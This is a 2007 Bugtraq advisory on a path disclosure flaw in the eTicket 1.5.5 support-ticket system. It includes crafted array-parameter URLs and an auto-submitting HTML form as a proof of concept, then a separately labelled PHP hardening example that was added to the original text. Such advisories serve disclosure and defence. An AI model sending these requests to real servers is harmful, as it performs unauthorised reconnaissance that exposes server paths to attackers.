List: bugtraq
Subject: eTicket version 1.5.5 Path Disclosure Vulnerability
From: securityresearch () netvigilance ! com
Date: 2007-06-27 21:04:15
Message-ID: 20070627210415.12041.qmail () securityfocus ! com
netVigilance Security Advisory #30
eTicket version 1.5.5 Path Disclosure Vulnerability
Description:
eTicket is an electronic (open source) support ticket system based on osTicket, that can receive tickets via email (pop3 or pipe) and a web-based form, as well as manage them using a web interface.
External References:
Mitre CVE: CVE-2007-2800
NVD NIST: CVE-2007-2800
OSVDB: 34785
Summary:
eTicket is an electronic (open source) support ticket system based on osTicket.
A security problem in the product allows attackers to gather the true path of the server-side script.
Advisory URL:
http://www.netvigilance.com/advisory0030
Release Date:
06/27/2007
Severity:
Risk: Low
CVSS Metrics:
Access Vector: Remote
Access Complexity: Low
Authentication: Not-required
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
Impact Bias: Normal
CVSS Base Score: 2.3
Target Distribution on Internet: Low
Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Confirmed
Vulnerability Impact: Attack
Host Impact: Path disclosure
SecureScout Testcase ID:
TC 17960
Vulnerable Systems:
eTicket version 1.5.5 (new version 1.5.5.1 is also vulnerable)
Vulnerability Type:
Program flaws - The product scripts have flaws which lead to Warnings.
Vendor:
HM2K
Vendor Status:
HM 2K from eTicket got the Draft advisory on 21 May 2007 and got extensive support in how to fix the security problems on 23 May 2007 and 28 May 2007. In HM 2K's own words HM 2K "lost interest" and HM 2K "seriously found it too difficult to orchestrate what you [netVigilance] were asking from me [HM 2K], so I just did what I thought was best.". netVigilance's tests show that version 1.5.5.1 is also vulnerable. There currently is no official fix for this advisory.
Workaround:
Disable warning messages: in the php.ini file, set the following line: display_errors = Off.
Example:
REQUEST:
http://[TARGET]/[PRODUCT FOLDER]/index.php?name[]=1
OR
http://[TARGET]/[PRODUCT FOLDER]/index.php?email[]=1
OR
http://[TARGET]/[PRODUCT FOLDER]/index.php?phone[]=1
OR
http://[TARGET]/[PRODUCT FOLDER]/index.php?subject[]=1
OR (available for version 1.5.5 and also for new version 1.5.5.1)
Make file (example.html) with the next content:
"
<html>
<body onLoad="document.forms(0).submit();">
<form action="http://[TARGET]/[PRODUCT FOLDER]/index.php" method="POST">
<input type="hidden" name="name[]" value="1">
<input type="hidden" name="email[]" value="1">
<input type="hidden" name="phone[]" value="1">
<input type="hidden" name="subject[]" value="1">
</form>
</body>
</html>
"
Then load it in any web browser.
REPLY:
<b>Warning</b>: htmlspecialchars() expects parameter 1 to be string, array given in <b>[DISCLOSED PATH][PRODUCT FOLDER]\inc\open_form.php</b> on line <b>[18 OR 26 OR 31 OR 51 OR 55]</b><br />
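A defensive counterpart to the flaw above, added here as an example and not eTicket's own code: request fields are reduced to strings before they reach htmlspecialchars(), so a name[]=1 parameter is discarded and logged server-side instead of triggering the warning that prints the script path. The function names and the constructed request array are assumptions.

```php
<?php
// Added example (not from eTicket). PHP parses "name[]=1" into an array;
// on the PHP versions of the advisory, passing that array to
// htmlspecialchars() emitted a warning that, with display_errors=On,
// revealed the absolute path of inc/open_form.php to the client.
declare(strict_types=1);

/**
 * Return $params[$key] as a string, or $default when the key is absent
 * or the value is not a scalar (e.g. "?name[]=1" arrives as an array).
 */
function param_string(array $params, string $key, string $default = ''): string
{
    if (!array_key_exists($key, $params)) {
        return $default;
    }
    $value = $params[$key];
    if (!is_scalar($value)) {
        // Record the anomaly server-side only; nothing about it is echoed back.
        error_log(sprintf('param_string: non-scalar value for "%s" from %s',
            $key, $_SERVER['REMOTE_ADDR'] ?? 'cli'));
        return $default;
    }
    return (string) $value;
}

/** HTML-escape a request field without ever passing a non-string to htmlspecialchars(). */
function form_field(array $params, string $key): string
{
    return htmlspecialchars(param_string($params, $key), ENT_QUOTES, 'UTF-8');
}

// Defence in depth, matching the advisory's workaround: never show errors
// to clients, but keep them in the server log.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Constructed input simulating "?name[]=1&email=a@b.example&subject=Hi <x>".
$request = ['name' => ['1'], 'email' => 'a@b.example', 'subject' => 'Hi <x>'];

// Vulnerable pattern described in the advisory (do not do this):
//   htmlspecialchars($request['name']);   // array given -> warning with full path
// Hardened form: the array is dropped, the strings are escaped.
foreach (['name', 'email', 'phone', 'subject'] as $field) {
    echo $field, '=', form_field($request, $field), PHP_EOL;
}
```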
Credits:
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com